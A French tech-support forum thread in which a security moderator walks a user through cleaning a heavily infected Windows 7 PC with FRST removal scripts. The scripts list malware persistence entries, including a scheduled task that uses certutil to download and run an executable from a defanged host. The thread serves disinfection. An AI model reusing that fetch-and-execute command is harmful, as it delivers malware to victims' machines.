Pc très lent presque inutilisable

Signaler
Messages postés
15
Date d'inscription
samedi 30 mai 2020
Statut
Membre
Dernière intervention
3 juillet 2020
-
Messages postés
26305
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
3 juillet 2020
-
Bonjour, mon pc est très très lent qu’il en est presque inutilisable je suis sur windows7 et j’ai du réinstaller Windows 7 pour un petit problème. Lors d’une ouverture d’un logiciel cela met 5-10min pour l’ouvrir, des logiciels que je n’ai même pas installé s’installent tout seul sur mon pc, lorsque j’utilise chrome beaucoup de pubs apparaissent toutes les 2min, et aussi mon pc fait énormément de bruit que j’en ai bien peur qu’il explose, il ne faisait pas autant de bruit avant. Je ne sais pas si c’est a cause d’un logiciel que j’ai voulu installer. J’ai essayé de tout nettoyer avec CCleaner et advanced system care mais rien n’y fait. S’il vous plaît aidez moi

4 réponses

Messages postés
26305
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
3 juillet 2020
9 234
Bonjour,
CCleaner et advanced system care sont inutiles.
Télécharge FRST une fois téléchargé enregistre-le sur le bureau puis ouvre-le tu auras ceci :

Puis coche la case shortcut comme ceci :

Clique sur Analyser à la fin de l'analyse tu auras trois fichiers texte sur le bureau FRST, Addition et Shortcut , attention de bien attendre que les messages disant que l'analyse est terminée s'affichent, ensuite envoie ces rapports sur https://pjjoint.malekal.com/ voir ce tutoriel paragraphe Envoyer les rapports d’analyse sur pjjoint puis donne les trois liens générés par Pjoint dans ton prochain message.

Messages postés
15
Date d'inscription
samedi 30 mai 2020
Statut
Membre
Dernière intervention
3 juillet 2020

Bonsoir, excusez moi pour ce retard c’est que mon pc est beaucoup trop lent, dès que j’ouvre quelque chose ça prend 5min pour l’ouvrir.

Voici les liens,
FRST : https://pjjoint.malekal.com/files.php?id=FRST_20200701_c15z5c9l6y9

Addition:
https://pjjoint.malekal.com/files.php?id=20200701_j8h15i8m14g11

Shortcut:
https://pjjoint.malekal.com/files.php?id=20200701_y14x14d12t9u11
Messages postés
26305
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
3 juillet 2020
9 234
Pas étonnant que ton pc a du mal à fonctionner il est vraiment très infecté.

Procédure à faire dans l'ordre indiqué :
ATTENTION pour que la désinfection fonctionne il faut démarrer ton pc en mode sans échec avec "prise en charge du réseau".

Pour le démarrage en mode sans échec il suffit de lire attentivement cette page et faire ce qui est indiqué pour démarrer Windows 7 en mode sans échec.
Tu peux imprimer les pages ou prendre des notes car à partir du paragraphe Les options de récupération tu ne seras plus sous Windows tu n'y reviendras qu'une fois en mode sans échec.

Une fois Windows démarré en mode sans échec avec prise en charge du réseau

1- Ouvre FRST
2- Copie l'intégralité du script qui est dans l'encadré qui suit :
Start::
CloseProcesses:
HKLM-x32\...\Run: [kissq] => C:\Users\Dalal\AppData\Local\Temp\kissq.exe************ [382464 2020-06-30] () [Fichier non signé]
HKLM\...\RunOnce: [hmhge0fcjm2] => C:\Program Files (x86)\CNoai\367933451.exe [475136 2020-06-19] () [Fichier non signé]
HKLM\...\RunOnce: [system recover] => C:\Program Files (x86)\Adobe\Bolezhegeki.exe [197632 2020-06-30] () [Fichier non signé]
HKLM-x32\...\RunOnce: [wextract_cleanup0] => rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Dalal\AppData\Local\Temp\IXP000.TMP\"
HKU\S-1-5-21-1048886537-4227766083-82584293-1000\...\Run: [KPKZG6SEKLD8LMS] => C:\Program Files\RMHK4DBCUT\RMHK4DBCU.exe [2768384 2020-06-19] (XJC62SX6) [Fichier non signé]
HKU\S-1-5-21-1048886537-4227766083-82584293-1000\...\Run: [3KP9HX2E14V7MU5] => C:\Program Files\LK35YI0K3K\R7UCT9PNJ.exe [2768384 2020-06-19] (XJC62SX6) [Fichier non signé]
HKU\S-1-5-21-1048886537-4227766083-82584293-1000\...\Run: [2795074] => C:\Users\Dalal\AppData\Roaming\ec0p1nnb4or\2uwloflef5s.exe [853892 2020-06-30] () [Fichier non signé] [Fichier en cours d'utilisation]
HKU\S-1-5-21-1048886537-4227766083-82584293-1000\...\Run: [ZGJR226UIF8IKLP] => C:\Program Files\QR24AKSM82\QR24AKSM8.exe [4077056 2020-06-30] (ENN426O@) [Fichier non signé]
HKU\S-1-5-21-1048886537-4227766083-82584293-1000\...\Run: [efinam] => C:\Program Files (x86)\efinam\efinam.dll [15360 2020-06-30] () [Fichier non signé]
HKU\S-1-5-21-1048886537-4227766083-82584293-1000\...\Run: [ShyViolet] => C:\Windows\rss\csrss.exe [3980800 2020-06-30] () [Fichier non signé] <==== ATTENTION
HKU\S-1-5-21-1048886537-4227766083-82584293-1000\...\Run: [CloudNet] => C:\Users\Dalal\AppData\Roaming\97ccdcfc9cef\97ccdcfc9cef.exe [549376 2020-06-30] () [Fichier non signé]
HKU\S-1-5-21-1048886537-4227766083-82584293-1000\...\Run: [6436488] => C:\Users\Dalal\AppData\Roaming\wgeq45r51rf\i3qwbpsbqyz.exe [853892 2020-06-30] () [Fichier non signé] [Fichier en cours d'utilisation]
HKU\S-1-5-21-1048886537-4227766083-82584293-1000\...\Run: [PR7B85B97SMKIV4] => C:\Program Files\B2L2GHKUEJ\B2L2GHKUE.exe [4077056 2020-06-30] (ENN426O@) [Fichier non signé]
HKU\S-1-5-21-1048886537-4227766083-82584293-1000\...\RunOnce: [dnNup] => C:\Users\Dalal\AppData\Local\Temp\25-1ab0e-118-157a1-b92256e3c4a21\Juwadynida.exe [726528 2020-06-30] () [Fichier non signé]
AppInit_DLLs: C:\ProgramData\AppmallosayoV\Toughtop.dll => C:\ProgramData\AppmallosayoV\Toughtop.dll [342528 2020-06-29] () [Fichier non signé]
AppInit_DLLs-x32: C:\ProgramData\AppmallosayoV\Betala.dll => C:\ProgramData\AppmallosayoV\Betala.dll [460800 2020-06-29] () [Fichier non signé]
InternetURL: C:\Users\akram.zoubir.lafamilia-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cdrhost.url -> URL: "C:\Users\akram.zoubir.lafamilia-PC\AppData\Roaming\cdrhost\ZRFCSx.vbs"
Startup: C:\Users\Dalal\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk [2020-06-19]
ShortcutTarget: SmartClock.lnk -> C:\Users\Dalal\AppData\Roaming\Smart Clock\SmartClock.exe (International GeoGebra Institute) [Fichier non signé]
CHR HKLM\SOFTWARE\Policies\Google: Restriction
Task: {7F3DE65B-78DB-4AA1-A97F-F782AEEFB4CF} - System32\Tasks\NvNgxUpdateCheckDaily_{78821544-1544-1544-1544-788215441544} => C:\Users\Dalal\AppData\Roaming\grtibts [258560 2020-01-03] () [Fichier non signé]
Task: {83A3C1AB-278A-42F5-AD2C-FEE6F2B94CC3} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxps://gfixprice.space/app/app.exe C:\Users\Dalal\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Dalal\AppData\Local\Temp\csrss\scheduled.exe /31340
Task: {CF3947EA-1FEC-4059-B78F-4F83A72CE245} - System32\Tasks\Smart Clock => C:\Users\Dalal\AppData\Roaming\Smart Clock\SmartClock.exe [599552 2020-06-19] (International GeoGebra Institute) [Fichier non signé]
Task: {D6D01BC3-2833-416D-900C-01BA9F5AF671} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [3980800 2020-06-30] () [Fichier non signé]
HKLM\SYSTEM\ControlSet001\Services\Voyasollam => C:\ProgramData\\Voyasollam\\Voyasollam.exe [4570624 2020-06-29] () [Fichier non signé]
HKLM\SYSTEM\ControlSet001\Services\{45487F67-EC9F-4449-A6F2-2D0970F9B80B} => C:\Windows\System32\drivers\Wdf64811.sys [6559120 2020-06-19] (Accès refusé) [Fichier non signé] <==== ATTENTION (Rootkit!/Service verrouillé)
HKLM\SYSTEM\ControlSet001\Services\Voyasollam => C:\ProgramData\\Voyasollam\\Voyasollam.exe [4570624 2020-06-29] () [Fichier non signé] <==== ATTENTION (Rootkit!/Service verrouillé)
R1 97CCDCFC9CEF; C:\Windows\97CCDCFC9CEF.sys [25368 2020-06-19] (大连纵梦网络科技有限公司 -> FsFilter Network)
R2 6A091B04; C:\ProgramData\6A091B04\C9DF6398.dll [4011520 2020-06-29] () [Fichier non signé]
S3 AppmallosayoV; C:\ProgramData\\AppmallosayoV\\AppmallosayoV.exe [4603392 2020-06-24] () [Fichier non signé]
R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2020-06-19] () [Fichier non signé]
R2 ChromeUpdater; C:\Windows\chromesvc.exe [2319872 2020-06-30] () [Fichier non signé]
S3 CloudPrinter; C:\ProgramData\\CloudPrinter\\CloudPrinter.exe [4570624 2020-06-29]
S3 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [2285664 2017-02-22] (GOLD CLICK LIMITED -> Gold Click Ltd)
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 0000-00-00] () <==== ATTENTION (zéro octet Fichier/Dossier)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows (R) Win 7 DDK provider) <==== ATTENTION (zéro octet Fichier/Dossier)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2020-06-19] (WDKTestCert Admin,131666266076831434 -> ) [Fichier non signé]
C:\Program Files (x86)\CNoai
C:\Program Files (x86)\Adobe\Bolezhegeki.exe
C:\Program Files\RMHK4DBCUT
C:\Program Files\LK35YI0K3K
C:\Users\Dalal\AppData\Roaming\ec0p1nnb4or
C:\Program Files\QR24AKSM82
C:\Program Files (x86)\efinam
C:\Windows\rss\csrss.exe
C:\Users\Dalal\AppData\Roaming\97ccdcfc9cef
C:\Users\Dalal\AppData\Roaming\wgeq45r51rf
C:\Program Files\B2L2GHKUEJ
C:\ProgramData\AppmallosayoV
C:\Users\Dalal\AppData\Roaming\grtibts
C:\ProgramData\\Voyasollam
C:\ProgramData\6A091B04
C:\ProgramData\\CloudPrinter
C:\Program Files (x86)\ProxyGate
C:\Users\Dalal\AppData\Roaming\Smart Clock
EmptyTemp:
End::

3- Une fois le script copié clique sur Corriger.

Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.

Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau envoie le via https://pjjoint.malekal.com/ puis met le lien généré par Pjoint dans ton prochain message.

5- Fait une nouvelle analyse FRST et donne les liens dans ta réponse.


6- VÉRIFIE ET DIT-MOI SI TON PROBLÈME EST TOUJOURS PRÉSENT.


bazfile
Modérateur/Contributeur sécurité.
un bonjour, une réponse, un merci font toujours plaisir.
Messages postés
26305
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
3 juillet 2020
9 234 >
Messages postés
15
Date d'inscription
samedi 30 mai 2020
Statut
Membre
Dernière intervention
3 juillet 2020

C'est mieux ou pas ? Fait une nouvelle analyse FRST
Messages postés
15
Date d'inscription
samedi 30 mai 2020
Statut
Membre
Dernière intervention
3 juillet 2020
>
Messages postés
26305
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
3 juillet 2020

Largement mieux qu'au départ mais windows update ne s'ouvre toujours pas cela me propose de redémarrer l'ordinateur alors que ça fait plusieurs fois je le redémarre, et pour l'analyse je vous envoie les liens ?
Messages postés
26305
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
3 juillet 2020
9 234 >
Messages postés
15
Date d'inscription
samedi 30 mai 2020
Statut
Membre
Dernière intervention
3 juillet 2020

Oui envoie les liens
Messages postés
15
Date d'inscription
samedi 30 mai 2020
Statut
Membre
Dernière intervention
3 juillet 2020
>
Messages postés
26305
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
3 juillet 2020

Messages postés
26305
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
3 juillet 2020
9 234 >
Messages postés
15
Date d'inscription
samedi 30 mai 2020
Statut
Membre
Dernière intervention
3 juillet 2020

Il y a encore une infection mais vu que tu n'arrives pas à démarrer en mode sans échec, on va passer par une autre méthode.

Fait une analyse avec "ESET NOD32 Online Scanner" supprime les infections qu'il trouvera VOIR CETTE PAGE.


Une fois la désinfection avec "ESET NOD32 Online Scanner" terminée:

Procédure à faire dans l'ordre indiqué :

1- Ouvre FRST
2 - Copie l'intégralité du script qui est dans l'encadré qui suit :
Start::
CreateRestorePoint:
CloseProcesses:
RemoveProxy:
EmptyTemp:
End::

3- Une fois le script copié clique sur Corriger.

Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.

Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau envoie le via https://pjjoint.malekal.com/ puis met le lien généré par Pjoint dans ton prochain message.

5- Fait une nouvelle analyse FRST et donne les liens rapports

.

Messages postés
29
Date d'inscription
mercredi 27 mai 2020
Statut
Membre
Dernière intervention
3 juillet 2020
1
Bonsoir ,

Ces symptômes présente le comportement d'un cheval de troie ou un logiciel publicitaire !

Ce qui peut provoquer la perte de données, le vol des informations , le dommage de ton système !

Ici télécharge kaspersky virus removal tool en mode sans échec avec prise en charge du réseau :
https://www.kaspersky.com/downloads/thank-you/free-virus-removal-tool

exécute le puis scan ton pc et nettoyer !
tu ne ne sais pas maintenant si les malware ont volé tes informations ou non !

Quel est le logiciel , le fichier que tu as exécuté avant que ces symptôme n'apparaissent ?

télécharge malwarebytes Anti malware en mode sans échec et corrige tous les virus dans le registre et efface les fichiers temporaires par ce que là normalement ce trouvent les ficheirs des virus ;

C:\Users\(Nom d'utlilisateur)\Appdata\Local\Temp
Puis efface tous les fichiers là , Attention n'efface pas le dossiers mais les fichiers et les dossiers à l'intérieur de lui

J'espère t'aider
Bonjour.
Il faut surtout faire du tri dans tes programmes (ceux que tu n'utilises pas) et faire un scan avec un bon antivirus. Tu peux aussi aller dans le gestionnaire des tâches (Ctrl + Maj + Echap) et aller dans l'onglet "Démarrage", puis vérifier que les programmes inutiles ne se lancent pas au démarrage. En espérant avoir pu t'aider. Bon courage !

Fraternellement,
ROY4 - ***********


***** Signature modifiée par la modération
Ne pas s'attribuer la fonction de contributeur dans sa signature quand on ne l'est pas.